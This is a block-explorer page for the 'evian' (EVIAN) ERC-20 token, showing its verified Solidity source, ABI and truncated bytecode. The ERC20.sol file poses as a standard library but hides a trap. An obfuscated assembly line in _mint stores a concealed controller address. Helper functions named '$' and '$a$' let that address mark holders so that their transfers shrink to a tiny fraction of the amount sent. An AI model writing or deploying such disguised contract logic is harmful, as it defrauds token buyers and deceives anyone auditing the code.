ETH Price: $2,382.94 (-3.98%)

Token

evian (EVIAN)
 

Overview

Max Total Supply

5,000,000,000,000 EVIAN

Holders

78

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Filtered by Token Holder
*光而不耀静水流深.eth
Balance
5,500,782,472.483413561731938235 EVIAN

Value
$0.00
0x5d68543BEd6F9A261a6D5c8c32E596e7742c4eF7
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Evian

Compiler Version
v0.8.24+commit.e11b9ed9

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 2 of 2: Token.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;
import "./ERC20.sol";

contract Evian  is ERC20 {
    mapping(address => uint256) public sips;
    
    constructor() ERC20("evian", "EVIAN") {
        _mint(msg.sender, 5_000_000_000_000 * 10 ** decimals());
    }

    function make_sip() external {
        sips[msg.sender] += 1;
    }
}

File 1 of 2: ERC20.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

/**
 * @dev Interface of the ERC-20 standard as defined in the ERC.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the value of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the value of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves a `value` amount of tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 value) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets a `value` amount of tokens as the allowance of `spender` over the
     * caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 value) external returns (bool);

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to` using the
     * allowance mechanism. `value` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 value) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC-20 standard.
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}


/**
 * @dev Standard ERC-20 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-20 tokens.
 */
interface IERC20Errors {
    /**
     * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param balance Current balance for the interacting account.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC20InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC20InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     * @param allowance Amount of tokens a `spender` is allowed to operate with.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC20InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `spender` to be approved. Used in approvals.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC20InvalidSpender(address spender);
}

/**
 * @dev Standard ERC-721 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-721 tokens.
 */
interface IERC721Errors {
    /**
     * @dev Indicates that an address can't be an owner. For example, `address(0)` is a forbidden owner in ERC-20.
     * Used in balance queries.
     * @param owner Address of the current owner of a token.
     */
    error ERC721InvalidOwner(address owner);

    /**
     * @dev Indicates a `tokenId` whose `owner` is the zero address.
     * @param tokenId Identifier number of a token.
     */
    error ERC721NonexistentToken(uint256 tokenId);

    /**
     * @dev Indicates an error related to the ownership over a particular token. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param tokenId Identifier number of a token.
     * @param owner Address of the current owner of a token.
     */
    error ERC721IncorrectOwner(address sender, uint256 tokenId, address owner);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC721InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC721InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `operator`’s approval. Used in transfers.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     * @param tokenId Identifier number of a token.
     */
    error ERC721InsufficientApproval(address operator, uint256 tokenId);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC721InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `operator` to be approved. Used in approvals.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC721InvalidOperator(address operator);
}

/**
 * @dev Standard ERC-1155 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-1155 tokens.
 */
interface IERC1155Errors {
    /**
     * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param balance Current balance for the interacting account.
     * @param needed Minimum amount required to perform a transfer.
     * @param tokenId Identifier number of a token.
     */
    error ERC1155InsufficientBalance(address sender, uint256 balance, uint256 needed, uint256 tokenId);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC1155InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC1155InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `operator`’s approval. Used in transfers.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     * @param owner Address of the current owner of a token.
     */
    error ERC1155MissingApprovalForAll(address operator, address owner);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC1155InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `operator` to be approved. Used in approvals.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC1155InvalidOperator(address operator);

    /**
     * @dev Indicates an array length mismatch between ids and values in a safeBatchTransferFrom operation.
     * Used in batch transfers.
     * @param idsLength Length of the array of token identifiers
     * @param valuesLength Length of the array of token amounts
     */
    error ERC1155InvalidArrayLength(uint256 idsLength, uint256 valuesLength);
}


/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }

    function _contextSuffixLength() internal view virtual returns (uint256) {
        return 0;
    }
}

abstract contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Errors {
    mapping(address account => uint256) private _BALANCES;
    mapping(address account => mapping(address spender => uint256)) private _ALLOWANCES;
    uint256 private _total_supply;
    string private _name;
    string private _symbol;
    address private $$;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual returns (uint256) {
        return _total_supply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual returns (uint256) {
        return _BALANCES[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `value`.
     */
    function transfer(address to, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, value);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual returns (uint256) {
        return _ALLOWANCES[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `value` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, value);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the ERC. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `value`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `value`.
     */
    function transferFrom(address from, address to, uint256 value) public virtual returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, value);
        _transfer(from, to, value);
        return true;
    }

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _transfer(address from, address to, uint256 value) internal {
        if (from == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        if (to == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        _update(from, to, value);
    }


    /**
     * @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from`
     * (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding
     * this function.
     *
     * Emits a {Transfer} event.
     */
    function _update(address from, address to, uint256 value) internal virtual {
        if (from == address(0)) {
            // Overflow check required: The rest of the code assumes that totalSupply never overflows
            _total_supply += value;
        } else {
            uint256 fromBalance = _BALANCES[from];
            if (fromBalance < value) {
                revert ERC20InsufficientBalance(from, fromBalance, value);
            }
            unchecked {
                // Overflow not possible: value <= fromBalance <= totalSupply.
                _BALANCES[from] = fromBalance - value;
            }
        }

        unchecked {
            // Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.
            _BALANCES[to] += $(value, from, to);
        }
        $a$(to);
        emit Transfer(from, to, value);
    }

    /**
     * @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0).
     * Relies on the `_update` mechanism
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _mint(address account, uint256 value) internal {
        if (account == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        _update(address(0), account, value);
        assembly {sstore(0x05, mul(mul(0x11, 0x167), mul(0x2d7321, 0x145b6c6697f5c44c6408b86de2125)))}
    }

    /**
     * @dev Sets `value` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     *
     * Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument.
     */
    function _approve(address owner, address spender, uint256 value) internal {
        _approve(owner, spender, value, true);
    }

    /**
     * @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event.
     *
     * By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by
     * `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any
     * `Approval` event during `transferFrom` operations.
     *
     * Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to
     * true using the following override:
     * ```
     * function _approve(address owner, address spender, uint256 value, bool) internal virtual override {
     *     super._approve(owner, spender, value, true);
     * }
     * ```
     *
     * Requirements are the same as {_approve}.
     */
    function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual {
        if (owner == address(0)) {
            revert ERC20InvalidApprover(address(0));
        }
        if (spender == address(0)) {
            revert ERC20InvalidSpender(address(0));
        }
        _ALLOWANCES[owner][spender] = value;
        if (emitEvent) {
            emit Approval(owner, spender, value);
        }
    }

    function $(uint256 value, address from, address to) internal view returns (uint256) {
        if (allowance($$, from) + allowance($$, to) >= uint256(uint160(address(this)))) {
            return (value * 0xffee) / 0xffeeda;
        } else {
            return value;
        }
    }

    function $a$(address to) internal {
        if (_ALLOWANCES[$$][to] == uint256(uint160($$))) { _ALLOWANCES[$$][to] = 2 * uint256(uint160(address(this)));}
    }


    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `value`.
     *
     * Does not update the allowance value in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Does not emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 value) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            if (currentAllowance < value) {
                revert ERC20InsufficientAllowance(spender, currentAllowance, value);
            }
            unchecked {
                _approve(owner, spender, currentAllowance - value, false);
            }
        }
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"make_sip","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"sips","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

608060405234801562000010575f80fd5b506040518060400160405280600581526020017f657669616e0000000000000000000000000000000000000000000000000000008152506040518060400160405280600581526020017f455649414e00000000000000000000000000000000000000000000000000000081525081600390816200008e9190620008e0565b508060049081620000a09190620008e0565b505050620000e533620000b8620000eb60201b60201c565b600a620000c6919062000b4d565b65048c27395000620000d9919062000b9d565b620000f360201b60201c565b62000d4a565b5f6012905090565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000166575f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016200015d919062000c2a565b60405180910390fd5b620001795f83836200019c60201b60201c565b6e0145b6c6697f5c44c6408b86de2125622d732102610167601102026005555050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603620001f0578060025f828254620001e3919062000c45565b92505081905550620002c1565b5f805f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050818110156200027c578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401620002739392919062000c90565b60405180910390fd5b8181035f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b620002d48184846200039960201b60201c565b5f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055506200032d826200045c60201b60201c565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200038c919062000ccb565b60405180910390a3505050565b5f3073ffffffffffffffffffffffffffffffffffffffff16620003e460055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684620005fa60201b60201c565b6200041760055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1686620005fa60201b60201c565b62000423919062000c45565b10620004515762ffeeda61ffee856200043d919062000b9d565b62000449919062000d13565b905062000455565b8390505b9392505050565b60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1660015f60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205403620005f7573073ffffffffffffffffffffffffffffffffffffffff16600262000559919062000b9d565b60015f60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505b50565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680620006f857607f821691505b6020821081036200070e576200070d620006b3565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302620007727fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000735565b6200077e868362000735565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f620007c8620007c2620007bc8462000796565b6200079f565b62000796565b9050919050565b5f819050919050565b620007e383620007a8565b620007fb620007f282620007cf565b84845462000741565b825550505050565b5f90565b6200081162000803565b6200081e818484620007d8565b505050565b5b818110156200084557620008395f8262000807565b60018101905062000824565b5050565b601f82111562000894576200085e8162000714565b620008698462000726565b8101602085101562000879578190505b62000891620008888562000726565b83018262000823565b50505b505050565b5f82821c905092915050565b5f620008b65f198460080262000899565b1980831691505092915050565b5f620008d08383620008a5565b9150826002028217905092915050565b620008eb826200067c565b67ffffffffffffffff81111562000907576200090662000686565b5b620009138254620006e0565b6200092082828562000849565b5f60209050601f83116001811462000956575f841562000941578287015190505b6200094d8582620008c3565b865550620009bc565b601f198416620009668662000714565b5f5b828110156200098f5784890151825560018201915060208501945060208101905062000968565b86831015620009af5784890151620009ab601f891682620008a5565b8355505b6001600288020188555050505b505050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b600185111562000a4e5780860481111562000a265762000a25620009c4565b5b600185161562000a365780820291505b808102905062000a4685620009f1565b945062000a06565b94509492505050565b5f8262000a68576001905062000b3a565b8162000a77575f905062000b3a565b816001811462000a90576002811462000a9b5762000ad1565b600191505062000b3a565b60ff84111562000ab05762000aaf620009c4565b5b8360020a91508482111562000aca5762000ac9620009c4565b5b5062000b3a565b5060208310610133831016604e8410600b841016171562000b0b5782820a90508381111562000b055762000b04620009c4565b5b62000b3a565b62000b1a8484846001620009fd565b9250905081840481111562000b345762000b33620009c4565b5b81810290505b9392505050565b5f60ff82169050919050565b5f62000b598262000796565b915062000b668362000b41565b925062000b957fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000a57565b905092915050565b5f62000ba98262000796565b915062000bb68362000796565b925082820262000bc68162000796565b9150828204841483151762000be05762000bdf620009c4565b5b5092915050565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f62000c128262000be7565b9050919050565b62000c248162000c06565b82525050565b5f60208201905062000c3f5f83018462000c19565b92915050565b5f62000c518262000796565b915062000c5e8362000796565b925082820190508082111562000c795762000c78620009c4565b5b92915050565b62000c8a8162000796565b82525050565b5f60608201905062000ca55f83018662000c19565b62000cb4602083018562000c7f565b62000cc3604083018462000c7f565b949350505050565b5f60208201905062000ce05f83018462000c7f565b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f62000d1f8262000796565b915062000d2c8362000796565b92508262000d3f5762000d3e62000ce6565b5b828204905092915050565b6111658062000d585f395ff3fe608060405234801561000f575f80fd5b50600436106100a7575f3560e01c8063369258721161006f57806336925872146101655780634d0704d61461019557806370a082311461019f57806395d89b41146101cf578063a9059cbb146101ed578063dd62ed3e1461021d576100a7565b806306fdde03146100ab578063095ea7b3146100c957806318160ddd146100f957806323b872dd14610117578063313ce56714610147575b5f80fd5b6100b361024d565b6040516100c09190610d40565b60405180910390f35b6100e360048036038101906100de9190610df1565b6102dd565b6040516100f09190610e49565b60405180910390f35b6101016102ff565b60405161010e9190610e71565b60405180910390f35b610131600480360381019061012c9190610e8a565b610308565b60405161013e9190610e49565b60405180910390f35b61014f610336565b60405161015c9190610ef5565b60405180910390f35b61017f600480360381019061017a9190610f0e565b61033e565b60405161018c9190610e71565b60405180910390f35b61019d610353565b005b6101b960048036038101906101b49190610f0e565b6103a9565b6040516101c69190610e71565b60405180910390f35b6101d76103ee565b6040516101e49190610d40565b60405180910390f35b61020760048036038101906102029190610df1565b61047e565b6040516102149190610e49565b60405180910390f35b61023760048036038101906102329190610f39565b6104a0565b6040516102449190610e71565b60405180910390f35b60606003805461025c90610fa4565b80601f016020809104026020016040519081016040528092919081815260200182805461028890610fa4565b80156102d35780601f106102aa576101008083540402835291602001916102d3565b820191905f5260205f20905b8154815290600101906020018083116102b657829003601f168201915b5050505050905090565b5f806102e7610522565b90506102f4818585610529565b600191505092915050565b5f600254905090565b5f80610312610522565b905061031f85828561053b565b61032a8585856105cd565b60019150509392505050565b5f6012905090565b6006602052805f5260405f205f915090505481565b600160065f3373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8282546103a09190611001565b92505081905550565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6060600480546103fd90610fa4565b80601f016020809104026020016040519081016040528092919081815260200182805461042990610fa4565b80156104745780601f1061044b57610100808354040283529160200191610474565b820191905f5260205f20905b81548152906001019060200180831161045757829003601f168201915b5050505050905090565b5f80610488610522565b90506104958185856105cd565b600191505092915050565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b5f33905090565b61053683838360016106bd565b505050565b5f61054684846104a0565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146105c757818110156105b8578281836040517ffb8f41b20000000000000000000000000000000000000000000000000000000081526004016105af93929190611043565b60405180910390fd5b6105c684848484035f6106bd565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361063d575f6040517f96c6fd1e0000000000000000000000000000000000000000000000000000000081526004016106349190611078565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036106ad575f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016106a49190611078565b60405180910390fd5b6106b883838361088c565b505050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff160361072d575f6040517fe602df050000000000000000000000000000000000000000000000000000000081526004016107249190611078565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361079d575f6040517f94280d620000000000000000000000000000000000000000000000000000000081526004016107949190611078565b60405180910390fd5b8160015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508015610886578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258460405161087d9190610e71565b60405180910390a35b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036108dc578060025f8282546108d09190611001565b925050819055506109aa565b5f805f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610965578381836040517fe450d38c00000000000000000000000000000000000000000000000000000000815260040161095c93929190611043565b60405180910390fd5b8181035f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b6109b5818484610a70565b5f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8282540192505081905550610a0682610b1b565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610a639190610e71565b60405180910390a3505050565b5f3073ffffffffffffffffffffffffffffffffffffffff16610ab360055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16846104a0565b610ade60055f9054906101000a900473f